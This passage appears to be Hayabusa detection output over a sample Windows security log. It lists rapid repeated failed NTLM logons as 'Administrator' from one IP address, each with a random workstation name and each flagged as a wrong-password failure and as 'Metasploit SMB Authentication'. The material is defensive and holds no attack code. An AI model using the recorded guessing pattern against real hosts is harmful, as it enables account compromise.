SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: 
